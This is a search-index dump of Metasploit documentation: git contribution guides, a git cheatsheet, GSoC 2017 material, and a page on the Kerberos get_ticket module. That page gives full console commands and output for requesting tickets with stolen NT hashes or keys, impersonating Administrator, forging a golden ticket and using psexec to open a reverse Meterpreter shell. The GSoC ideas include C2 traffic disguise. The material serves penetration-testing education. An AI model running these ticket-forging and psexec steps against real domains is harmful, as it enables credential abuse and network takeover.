git status # On branch upstream-master nothing to commit, working directory clean . Ok, now do a git pull to download the latest changes from Metasploit: . $ git pull Already up-to-date. At this point, you’re ready to start a new branch. In this case, we’ll name our new branch “my_awesome_branch”: . $ git checkout -b my_awesome_branch Switched to a new branch 'my_awesome_branch' . And then you can go ahead and add that module. Make sure it’s in the appropriate path: . $ git add [module path] . 
When you decide to save the changes, commit (if there’s only one module, you can do git commit -a too so you don’t have to type the module path. Note -a really means EVERYTHING): . $ git commit [module path] . When you’re done, push your changes, which will upload your code to your remote branch “my_awesome_branch”. You must push your changes in order to submit the pull request or share it with others on the Internet. $ git push origin my_awesome_branch . ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#basic-git-commands",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#basic-git-commands"
  },"129": {
    "doc": "Writing an exploit",
    "title": "References",
    "content": ". | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit.rb | . ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#references",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#references"
  },"130": {
    "doc": "Writing an exploit",
    "title": "Writing an exploit",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html"
  },"131": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Requesting tickets",
    "content": "The auxiliary/admin/kerberos/get_ticket module can be used to request TGT/TGS tickets from the KDC. The following ACTIONS are supported: . | GET_TGT: legally request a TGT from the KDC given a password, an NT hash or an encryption key. The resulting TGT will be cached. | GET_TGS: legally request a TGS from the KDC given a password, an NT hash, an encryption key or a cached TGT. If the TGT is not provided, it will request it the same way the “TGT action” does. The resulting TGT and the TGS will be cached. | . ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#requesting-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#requesting-tickets"
  },"132": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/get_ticket | Do: run rhosts=<remote host> domain=<domain> username=<username> password=<password> action=GET_TGT | You should see that the TGT is correctly retrieved, stored in loot, and listed by the klist command | Try with the NT hash (NTHASH option) and the encryption key (AES_KEY option) instead of the password | Do: run rhosts=<remote host> domain=<domain> username=<username> password=<password> action=GET_TGS spn=<SPN> | You should see that the module uses the TGT in the cache and does not request a new one | You should see that the TGS is correctly retrieved and stored in the loot | Do: run rhosts=<remote host> domain=<domain> username=<username> password=<password> action=GET_TGS spn=<SPN> KrbUseCachedCredentials=false | You should see that the module does not use the TGT in the cache and requests a new one | You should see that both the TGT and the TGS are correctly retrieved and stored in the loot | Try with the NT hash (NTHASH option) and the encryption key (AES_KEY option) instead of the password | . ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#module-usage"
  },"133": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Options",
    "content": "CERT_FILE . The PKCS12 (.pfx) certificate file to authenticate with. When this option is set, USERNAME and DOMAIN are optional and will be extracted from the certificate unless specified. Specifying a certificate causes PKINIT to be used to obtain the ticket. The module will provide a warning if USERNAME and DOMAIN are set but do not match any entries within the certificate. CERT_PASSWORD . The certificate file’s password. DOMAIN . The Fully Qualified Domain Name (FQDN). Ex: mydomain.local . USERNAME . The domain username to authenticate with. PASSWORD . The user’s password to use. NTHASH . The user’s NT hash, as a hex string, to authenticate with. Note that the DC must support RC4 encryption. AES_KEY . The user’s AES key, as a hex string, to use for Kerberos authentication. Supported keys: 128 or 256 bits. SPN . This option is only used when requesting a TGS. The Service Principal Name; the format is service_name/FQDN. Ex: cifs/dc01.mydomain.local. IMPERSONATE . The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket). KrbUseCachedCredentials . This option is only used when requesting a TGS. If set to true, the module looks for a matching TGT in the database and, if found, uses it for Kerberos authentication when requesting a TGS. Default is true. Krb5Ccname . This option is only used when requesting a TGS. The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked. ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#options",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#options"
  },"134": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Scenarios",
    "content": "Requesting a TGT . An example of viewing the Kerberos ticket cache, and requesting a TGT with NT hash: . msf6 auxiliary(admin/kerberos/get_ticket) > klist Kerberos Cache ============== No tickets msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=<redacted> action=GET_TGT [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104181416_default_10.0.0.24_mit.kerberos.cca_912121.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) > klist Kerberos Cache ============== host principal sname issued status path ---- --------- ----- ------ ------ ---- 192.168.123.13 [email protected] krbtgt/[email protected] 2023-01-12 19:37:54 +0000 valid /Users/usr/.msf4/loot/20230112193756_default_192.168.123.13_mit.kerberos.cca_131390.bin msf6 auxiliary(admin/kerberos/get_ticket) > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.0.0.24 Unknown device msf6 auxiliary(admin/kerberos/get_ticket) > services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 10.0.0.24 88 tcp kerberos open Module: auxiliary/admin/kerberos/get_ticket, KDC for domain mylab.local . TGT with encryption key . msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGT [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGT for [email protected] [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182051_default_10.0.0.24_mit.kerberos.cca_535003.bin [*] Auxiliary module execution completed . 
TGT with password . msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGT [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGT for [email protected] [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182219_default_10.0.0.24_mit.kerberos.cca_533360.bin [*] Auxiliary module execution completed . TGT with certificate . msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 cert_file=/home/msfuser/.msf4/loot/20230124155521_default_10.0.0.24_windows.ad.cs_384669.pfx action=GET_TGT [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGT for [email protected] [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20230124155555_default_192.168.159.10_mit.kerberos.cca_702818.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) > . Requesting a TGS . TGS with NT hash: . 
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_760650.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_883314.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_760650.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_883314.bin . TGS with encryption key: . msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183040_default_10.0.0.24_mit.kerberos.cca_140502.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183040_default_10.0.0.24_mit.kerberos.cca_500387.bin [*] Auxiliary module execution completed . TGS with password: . 
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin [*] Auxiliary module execution completed . TGS with cached TGT: . msf6 auxiliary(admin/kerberos/get_ticket) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Using cached credential for krbtgt/mylab.local Administrator [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183346_default_10.0.0.24_mit.kerberos.cca_525186.bin [*] Auxiliary module execution completed . TGS without cached TGT: . 
msf6 auxiliary(admin/kerberos/get_ticket) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local KrbUseCachedCredentials=false [*] Running module against 10.0.0.24 [-] Auxiliary aborted due to failure: unknown: Error while requesting a TGT: Kerberos Error - KDC_ERR_PREAUTH_REQUIRED (25) - Additional pre-authentication required - Check the authentication-related options (PASSWORD, NTHASH or AES_KEY) [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local KrbUseCachedCredentials=false password=<redacted> [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_200958.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_849639.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: 
MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_200958.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_849639.bin . TGS impersonating the Administrator account: . msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGS impersonating [email protected] (SPN: cifs/dc02.mylab.local) [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: servicea 
/home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin . TGS using a previously forged golden ticket: . # Forge a golden ticket msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator [*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin [*] Auxiliary module execution completed # Request a silver ticket: msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local [*] Running module against 10.10.11.5 [*] 10.10.11.5:88 - Using cached credential for krbtgt/[email protected] [email protected] [*] 10.10.11.5:88 - Getting TGS for [email protected] (SPN: cifs/dc02.dev.demo.local) [+] 10.10.11.5:88 - Received a valid TGS-Response [*] 10.10.11.5:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin [+] 10.10.11.5:88 - Received a valid delegation TGS-Response [*] Auxiliary module execution completed # Use psexec: msf6 exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1 [*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 10.10.11.5:445 - Connecting to the server... [*] 10.10.11.5:445 - Authenticating to 10.10.11.5:445|dev.demo.local as user 'Administrator'... [*] 10.10.11.5:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin [*] 10.10.11.5:445 - Selecting PowerShell target [*] 10.10.11.5:445 - Executing the payload... [+] 10.10.11.5:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 10.10.11.5 [*] Meterpreter session 1 opened (192.168.123.1:4444 -&amp;gt; 10.10.11.5:60625) at 2023-03-09 12:08:49 +0000 meterpreter &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#scenarios"
  },"135": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Get Ticket granting tickets and service tickets",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html"
  },"136": {
    "doc": "Git cheatsheet",
    "title": "Git Cheatsheet (survival level)",
    "content": "Here is a set of some of the most common things you’ll need to do in your day-to-day workflow with Git. Pro Tip 1: you can get man pages for any git command by inserting a hyphen. As in: “man git-fetch” or “man git-merge” . Pro Tip 2: install the cheat gem for a really long cheat sheet available in your terminal. ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#git-cheatsheet-survival-level",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#git-cheatsheet-survival-level"
  },"137": {
    "doc": "Git cheatsheet",
    "title": "What’s going on?",
    "content": ". | What branch am I on? Which files are modified, which are staged, which are untracked, etc? . git status . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#whats-going-on",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#whats-going-on"
  },"138": {
    "doc": "Git cheatsheet",
    "title": "Fetch, Pull, and Push",
    "content": ". | Get all new changes, and remote branch refs . git fetch . | Do a git fetch and (if possible) a merge on the current branch . git pull . | Push commits to the origin/master (like an SVN commit): . git push origin master . | Push commits on a non-master branch: . git push origin your_branch_name . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#fetch-pull-and-push",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#fetch-pull-and-push"
  },"139": {
    "doc": "Git cheatsheet",
    "title": "Branching",
    "content": ". | See a list of local branches . git branch . | Switch to an existing branch . git checkout existing_branch_name . | Create a new branch and switch to it: . git checkout -b new_branch_name . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#branching",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#branching"
  },"140": {
    "doc": "Git cheatsheet",
    "title": "Merging and Stashing",
    "content": ". | Merge my working branch into current branch: . git merge working_branch_name . | Temporarily clear my stage so I can switch to another branch (“stashing”): . git stash . | Get my stashed stuff back, leaving it in the list of stashes: . git stash apply . | Get my stashed stuff back, removing it from the list: . git stash pop . | . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#merging-and-stashing",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#merging-and-stashing"
  },"141": {
    "doc": "Git cheatsheet",
    "title": "History, Conflicts, and Fixing Mistakes",
    "content": ". | See the log of commits: . git log . | See what changes were made in a given commit: . git show COMMIT_HASH . | See more detailed log information: . git whatchanged . | Get rid of all the changes I’ve made since last commit: . git reset --hard . | Get rid of the changes for just one file: . git checkout FILENAME . | Make HEAD point to the state of the codebase as of 2 commits ago: . git checkout HEAD^^ . | Fix a conflict (w/ system’s default graphical diff tool): . git mergetool . | Revert a commit (be careful with merges!): . git revert <commit hash> . | Revert a commit from a merge: . git revert -m<number of commits back in the merge to revert> <hash of merge commit> . | . (e.g. git revert -m1 4f76f3bbb83ffe4de74a849ad9f68707e3568e16 will revert the first commit back in the merge performed at 4f76f3bbb83ffe4de74a849ad9f68707e3568e16) . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#history-conflicts-and-fixing-mistakes",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#history-conflicts-and-fixing-mistakes"
  },"142": {
    "doc": "Git cheatsheet",
    "title": "Git in Bash",
    "content": "When using Git, it’s very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you’re currently on. Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt: . function parse_git_branch { git branch --no-color 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \\(.*\\)/(\\1)/' } . ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html#git-in-bash",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html#git-in-bash"
  },"143": {
    "doc": "Git cheatsheet",
    "title": "Git cheatsheet",
    "content": " ",
    "url": "/docs/development/get-started/git/git-cheatsheet.html",
    "relUrl": "/docs/development/get-started/git/git-cheatsheet.html"
  },"144": {
    "doc": "Git Reference Sites",
    "title": "Learning Git",
    "content": "The following sites are great references for Git padawans and jedi alike: . | Git-SVN crash course: Lots of good stuff on helping newbies grok the concepts of Git w/ reference to similar concepts in Subversion. | Codecademy Git Course: Great free course for quickly getting up to speed on Git with helpful hands on exercises. | Learn Git Branching: Good website for learning how Git branching works in a visual and interactive manner. | Git Reference: From the site: “meant to be a quick reference for learning and remembering the most important and commonly used Git commands.” Follows a tutorial-like format. Great for beginners. | The Pro Git Book: A free, online copy of the Pro Git book by GitHubber Scott Chacon. | The Git Community Book: A free book put together by the Git community for those new to Git. | Git Magic: Another free Git book put together by a Stanford CS student. | Git Ready: A collection of Git tips and tricks. | The Git Parable: A story by GitHub founder Tom Preston-Werner that reveals the underlying principles behind Git’s construction. A great starting point for understanding the nature of Git. | Git is Easier Than You Think: A nice tutorial that breaks down one Git user’s experience switching from Subversion. | PeepCode: Git: A one-hour (not-free) screencast covering Git basics. Well-made and easy to follow. | GitHub Flow: Another great post from Scott Chacon describing a GitHub-based workflow for projects. | Getting Started with GitHub: Also from GitHub’s own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub. | . ",
    "url": "/docs/development/get-started/git/git-reference-sites.html#learning-git",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html#learning-git"
  },"145": {
    "doc": "Git Reference Sites",
    "title": "Using Git in Editors",
    "content": ". | Fugitive plugin for Vim: Provides lots of tasty functionality from inside Vim. There’s also a five-part series on VimCasts on using Fugitive for almost any git task you can think of. | TextMate - a bundle for git ships with the editor. Highlight your top-level folder in the project drawer and then invoke with Command-Shift-G . | . ",
    "url": "/docs/development/get-started/git/git-reference-sites.html#using-git-in-editors",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html#using-git-in-editors"
  },"146": {
    "doc": "Git Reference Sites",
    "title": "SVN mirroring",
    "content": "Of course, if you’re still having trouble, GitHub does offer basic SVN read-write support. ",
    "url": "/docs/development/get-started/git/git-reference-sites.html#svn-mirroring",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html#svn-mirroring"
  },"147": {
    "doc": "Git Reference Sites",
    "title": "Git Reference Sites",
    "content": " ",
    "url": "/docs/development/get-started/git/git-reference-sites.html",
    "relUrl": "/docs/development/get-started/git/git-reference-sites.html"
  },"148": {
    "doc": "2017 Mentor Organization Application",
    "title": "2017 Mentor Organization Application",
    "content": "This is how the application was submitted on 2017-02-08. Please make no more edits . – . Please don’t use markdown here, we have to paste it into a form. All answers are limited to 1000 chars. – . Why does your org want to participate in Google Summer of Code? . The story of Metasploit Framework’s creation and development over the last 13 years is one of community collaboration to create and hone tools useful to a wide range of security practitioners. Its broad functionality, combined with the deep domain knowledge of the mentors, offers a unique opportunity for students to learn about security and exploit development. Many of our contributors are established exploit developers and penetration testers who have years of industry experience that they can share with students. We hope that the experience will inspire students to continue contributing to open source security, as well as providing them with invaluable real-world training in development, security, and remote collaboration. How will you keep mentors engaged with their students? . All of our mentors are long-time development team members who have a history of helping new users and contributors. Many of our mentors specialize in certain parts of the framework, so depending on the student’s interests, we will match them with the most complementary mentor. Our project administrators will regularly check in with mentors and students to ensure that the relationship is productive and progressing as expected. How will you help your students stay on schedule to complete their projects? . First, we will ask students to use GitHub’s Projects to track progress in real time as they are working. Mentors will help students divide projects into manageable chunks with measurable milestones. This will help students learn how to manage and break up tasks on large scale projects. 
Additionally, students and mentors will need to collaborate on a weekly status report that describes their progress and send it to the mailing list. How will you get your students involved in your community during GSoC? . Students will use the same channels that all our contributors use: IRC and GitHub. Students will follow the same procedures of code review that all our contributors follow. By providing them with the same communication channels that our community uses, we hope to encourage the students to interact and collaborate with other contributors and users and to explore additional resources beyond their mentor. Hopefully, this process will give them a network of support and illustrate the advantages of working with other minds. How will you keep students involved with your community after GSoC? . Based on the success of the project, we will encourage students to apply for committer rights at the conclusion of GSoC, include them in Metasploit roadmap discussions, and invite them to special community events. After the conclusion of GSoC we will encourage students to write about their experience on Metasploit’s community blog, which will give their work greater exposure to the overall security community. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-mentor-organization-application.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-mentor-organization-application.html"
  },"149": {
    "doc": "2017 Project Ideas",
    "title": "Console side",
    "content": "Convert between CMD_UNIX and the interpreted language architectures . Perl, Python, and Ruby scripts can all be run via a short command line invocation. It would be nice to be able to use these payloads in ARCH_CMD contexts as well as their own separate architectures (ARCH_PYTHON, ARCH_RUBY). This would allow modules that exploit command injection vulnerabilities to use python meterpreter in particular. Difficulty: 4/5 Requirements: Ruby, Python, bash/sh Mentor: @wvu @sempervictus . Automated exploit reliability scoring . Automatically run a module over and over, determine success rates. Mentor: @busterb . Exploit regression testing . Set up automated testing using something like Vagrant to spin up and configure vulnerable machines, run exploits against them. A categorical focus . Something like “make all X exploits badass”, or add a full suite of modules around particular gear or vendor stack. Requirements: Ruby Mentor: @hdm . Allow post modules to take a payload . As it stands, the framework defines anything that takes a payload to be an exploit. Because post-exploitation modules cannot take a payload, things that want to drop an executable for persistence are implemented as local exploits (in the exploit/*/local namespace instead of post/*/persistence). This project would give those kinds of modules a more consistent interface. Once this is done, we can move the exploit/*/local modules that aren’t actually exploits back to post/ . Difficulty: 3/5 Requirements: Ruby Mentor: @egypt . SMB2 support . (see also ruby_smb project) . Difficulty: 5/5 Mentor: @egypt . Filesystem sessions . The idea here is to create a new session type for authenticated protocols that give you filesystem access. The simplest is FTP, so that’s where we should start. We’ll need several pieces for this to work: . | A new session interface in Msf::Sessions (lib/msf/base/sessions/). This should be abstract enough that we can implement protocols other than FTP in the future. 
| A mapping of protocol details to that interface. | A new command dispatcher implementing at least these commands: upload, download, ls, cd | We’ll need to modify auxiliary/scanner/ftp/ftp_login to create one of these awesome new sessions when authentication is successful. | . Difficulty: 2/5 Requirements: Ruby . SMB-based file transport for Meterpreter . The idea here is to create a transport that allows Meterpreter and Console to talk via File handles opened via UNC path. In cases where 445 is allowed outbound, Meterpreter can open file handles to a UNC path that MSF is listening on, and they can communicate on those file handles. For this to work we need: . | A new transport that knows how to operate over SMB file handles . | In particular, one file handle is used for writing, and one for reading. | . | New stagers that use the Win32 API to open file handles to a given UNC path. | Most of this is already done in a PR for named pipe transport support, and so a few changes to those stagers should result in it working fine for this. | . | To come up with a method/protocol that both Console and Meterpreter can use to identify when new sessions come in. | . Given that SMB file reading and writing is already a thing, this shouldn’t be too hard on the MSF side. Difficulty: 3/5 Requirements: Ruby & SMB Mentor: @OJ and/or @egypt . – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#console-side",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#console-side"
  },"150": {
    "doc": "2017 Project Ideas",
    "title": "Payload side",
    "content": "Malleable HTTP/S C2 for Meterpreter . Currently, the attributes that one can set for how a Meterpreter payload appears at the HTTP level are limited. We would like the ability to set and add arbitrary HTTP headers to requests and responses, so that the traffic appears more realistic. Difficulty: 5/5 Requirements: C, Ruby. Bonus: Python, PHP Mentor: @busterb . Asynchronous victim-side scripting . Using either Python or Powershell (or maybe both if it can be abstract enough). This could allow things like running Responder.py or Empire on a compromised host. Difficulty: 4/5 Requirements: C, Python/Powershell Mentor: @OJ . Use SChannel in native Windows Meterpreter instead of embedded OpenSSL . SChannel is Windows’ built-in TLS library. Difficulty: 3/5 Requirements: C, Windows systems programming Mentor: @OJ . SMB-based file transport for Meterpreter . This is the Meterpreter side of the SMB transport mentioned in the Console section. For this to work we need: . | A new Meterpreter transport that uses file handles to read and write data over SMB to talk to MSF. | Use the named pipe transport PR to see how this might work. | . | Full support of the “protocol” that has been designed so that MSF knows when sessions come in. | . Difficulty: 2/5 Requirements: C, Windows systems programming Mentor: @OJ . – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#payload-side",
